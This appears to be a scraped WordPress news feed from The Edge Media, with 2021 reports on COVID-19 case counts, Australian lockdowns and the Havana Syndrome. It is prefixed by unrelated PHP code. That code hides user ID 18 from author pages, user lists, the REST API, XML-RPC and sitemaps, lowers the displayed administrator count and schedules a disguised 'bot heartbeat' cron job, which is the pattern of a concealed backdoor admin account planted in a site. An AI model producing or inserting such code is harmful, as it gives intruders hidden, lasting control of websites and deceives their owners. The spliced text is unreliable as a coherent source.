add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post In Karnataka, there are already seven cases of the coronavirus variant AY.4.2 appeared first on The Edge Media.
]]>
Speaking to reporters in Bengaluru, State Health and Family Welfare Commissioner D. Randeep said: “There are seven cases [of AY.4.2] in the State — three in Bengaluru and four in different parts of the State.” Maintaining that COVID-19 instances in the state are under control, Mr. Randeep stated that the government is making a negative RT-PCR test report, obtained 72 hours before arrival, essential for those traveling to the state from outside the country.
The post In Karnataka, there are already seven cases of the coronavirus variant AY.4.2 appeared first on The Edge Media.
]]>The post Covid-19: Sisodia has said that all Delhi schools will resume on Monday appeared first on The Edge Media.
]]>
In-person classes are currently only allowed in New Delhi schools for students in Class 9 and higher.
After attending Wednesday’s meeting of the DDMA, Manish Sisodia said: “The government, the officials in the Delhi Disaster Management Authority (DDMA), and experts are of the opinion that suspension of in-person classes in schools is tremendously affecting overall growth in children. The authority feels it is now safe to restart schools fully. From November 1, all public and private schools will be allowed to open all classes for in-person attendance.”
The post Covid-19: Sisodia has said that all Delhi schools will resume on Monday appeared first on The Edge Media.
]]>The post India reports a daily increase of 12,428 Covid-19 cases, the lowest in 238 days appeared first on The Edge Media.
]]>
Meanwhile, the number of active cases fell to 1,63,816, the lowest level in 241 days. For the past 31 days, the daily increase in new coronavirus infections has been below 30,000, and less than 50,000 daily new cases have been reported for the past 120 days.
The post India reports a daily increase of 12,428 Covid-19 cases, the lowest in 238 days appeared first on The Edge Media.
]]>The post India reports 14,306 fresh Covid Cases; Kerala highest contributor appeared first on The Edge Media.
]]>
The country’s active caseload has dropped to 167,695, the lowest in 239 days, and accounts for fewer than 1% of overall infections, according to the health ministry.
The recovery rate in the country has risen to 98.18 percent, the highest level since the outbreak began. According to the health ministry, the weekly positivity rate was 1.24 percent and the daily positivity rate was 1.43 percent.
The post India reports 14,306 fresh Covid Cases; Kerala highest contributor appeared first on The Edge Media.
]]>The post Queensland avoids lockdown after it detected zero COVID-19 infections appeared first on The Edge Media.
]]>The state on Saturday reported five cases of COVID-19, with state Premier Annastacia Palaszczuk warning that a lockdown could be needed to stop the spread of the virus.
However, the state said testing had yet to detect any further cases, avoiding the need such a measure.
“We’re not out of the woods yet, but this is the best result we could have hoped for at this point in the outbreak,” Queensland Deputy Premier Steven Miles told reporters in Brisbane.
The result is a boost for Australia’s A$2 trillion ($1.5 trillion) economy, which is at risk of slipping into its second recession in as many years as a result of lockdowns of the country’s two most populous states, Victoria and New South Wales.
Victoria on Sunday recorded 392 COVID-19 infections in the past 24 hours, down slightly from the 450 cases recorded in the state a day earlier.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post Queensland avoids lockdown after it detected zero COVID-19 infections appeared first on The Edge Media.
]]>The post Singapore currently ranks seventh in the world for vaccination appeared first on The Edge Media.
]]>So far, they haven’t blinked — even as local infections surpass numbers reached when Singapore implemented its “circuit-breaker” shutdown in April 2020 and pushed cases so low that it became one of the stars of the Covid Zero approach to the pandemic. Previously, infection spikes like this were met with stringent restrictions like bans on indoor dining and closing gyms.
The country reported 450 cases of local infection on Thursday, while those who are seriously ill or in intensive care ticked up to 33 people, according to data by the health ministry.
A high rate of vaccination, Singapore is currently ranked seventh in the world, has helped contain hospitalizations and deaths. But those numbers are likely to climb in the weeks to come, as some early infections turn deadly.
Whether or not Singapore keeps to its reopening and normalization plan as the pathogen starts to circulate more widely will determine the future of the financial and business hub that has been considered a key entry point into Asia.
The post Singapore currently ranks seventh in the world for vaccination appeared first on The Edge Media.
]]>The post Here’s a brief run-down of the entire situation surrounding the Havana Syndrome appeared first on The Edge Media.
]]>Here’s a brief run-down of the entire situation surrounding the Havana Syndrome:
Cases
On Tuesday, US vice-president Kamala Harris delayed for several hours a trip to Vietnam after the US embassy in Hanoi reported a possible case involving “acoustic incidents” there, raising concerns she could be a target. Ultimately Harris did go to Hanoi, but the US state department said it was investigating a case of what the federal government officially dubbed an “anomalous health incident” or AHI. It was later unofficially called the ‘Havana Syndrome’ by the media.
However, it is important to understand that the ‘Havana Syndrome’ is not new. Dozens of such cases were reported by US diplomats and intelligence officers since 2016, first in Cuba, then in China, Germany, Australia, Taiwan, and in Washington, DC itself.
In July, the New Yorker magazine reported there have been dozens of cases among the US officials in Vienna, Austria since the beginning of 2021. However, the actual number of incidents reported among American officials has been kept under the wraps for security reasons.
Why is it called the ‘Havana Syndrome’?
The syndrome was first named after Havana after the administration of former US President Donald Trump pulled the country’s officials out of the Cuban capital and expelled 15 Cuban diplomats from Washington, hinting that either its government or Russia was behind the attacks.
After Trump accused Cuba of perpetrating the attacks, the US government reduced staff to the embassy in the country to a minimum. The Cuban foreign minister, in turn, accused the US of lying about the incident and denied any involvement.
Concerns
There are concerns among officials of the US state department that a powerful rival, possibly Russia, is mounting the attacks, reported the AFP news agency.
Following Kamala Harris’ delayed trip to Vietnam, former CIA operative Marc Polymeropoulos, himself a victim of the same syndrome in Moscow in 2017, said the volume of attacks appeared to be mounting.
“This is a message that they can get at our senior VIPs,” he said, adding that the volume of attacks now includes intelligence officers, diplomats, and US military officers.
Symptoms
People who have been reported to be down with the Havana Syndrome have often mentioned hearing a “focused, high-pitched and sharp sound” that left them nauseated. In some cases, the afflicted had bloody noses, headaches, and other symptoms that resembled concussions.
Cause
At the end of 2020, the National Academy of Sciences studied the available cases and concluded they appeared to represent a distinctive set of symptoms, unlike any other known disorder. Their report noted that the symptoms vary among those affected, and not all of them were tied to a perceived sharp, directed sound.
However, the academy noted in its report that the best explanation for the syndrome would be “pulsed, directed microwaves”. The Central Intelligence Agency (CIA) has also created a task force to study the issue in detail.
(With inputs from agencies)
The post Here’s a brief run-down of the entire situation surrounding the Havana Syndrome appeared first on The Edge Media.
]]>The post The Onam Festival Week Causes a Massive Covid Surge, With Kerala Recording a 3-Month High of 24k Cases appeared first on The Edge Media.
]]>On Tuesday, India received 37,642 new cases, the highest single-day total since August 13. According to statistics, Kerala accounted for roughly 65 percent of the Covid total. This comes just a day after Kerala nearly equaled India’s Covid total with 24,733 cases discovered.
The 24,296 cases reported on Tuesday were the most in a single day since the state recorded 28,798 on May 26. This increase in instances follows days of low testing and detections due to Onam.
Kerala reported 17,106 Covid-19 cases and 83 deaths on Onam day, as markets throughout the state reported crowding ahead of the celebration. The test positivity rate in the state was 17.73 percent. The test positivity percentage increased to 18.04 percent on Tuesday, the highest level in recent weeks.
The post The Onam Festival Week Causes a Massive Covid Surge, With Kerala Recording a 3-Month High of 24k Cases appeared first on The Edge Media.
]]>The post Australia Sees Worst Day of Pandemic Amid Delta Outbreak appeared first on The Edge Media.
]]>New South Wales recorded 681 new cases, Premier Gladys Berejiklian told reporters on Thursday in Sydney, where stay-at-home orders have been enforced for almost two months. Meanwhile, Victoria state recorded 57 new infections — more than double from the previous day, and its highest tally since September — as Melbourne endures its sixth lockdown since the pandemic began.
New South Wales, Victoria and Australian Capital Territory recorded a combined 754 cases in their communities on Thursday, surpassing the nation’s previous high of 725 recorded in early August 2020, when Melbourne was in the midst of a lockdown that lasted for three months.
The post Australia Sees Worst Day of Pandemic Amid Delta Outbreak appeared first on The Edge Media.
]]>The post Lockdown extends in Melbourne appeared first on The Edge Media.
]]>The city entered its sixth pandemic lockdown last Thursday after a fresh Delta variant cluster emerged at a Melbourne school and quickly spread.
Daniel Andrews, the premier of the state of Victoria, said lockdown rules will be extended until at least August 19, after 20 new cases were detected overnight including several “mystery” cases.
There are too many cases, the origins of which are not clear to us… for us to safely come out of lockdown now,” he said.
In Sydney, more than five million people are enduring their seventh week under stay-at-home orders, currently scheduled to remain until the end of August.
The post Lockdown extends in Melbourne appeared first on The Edge Media.
]]>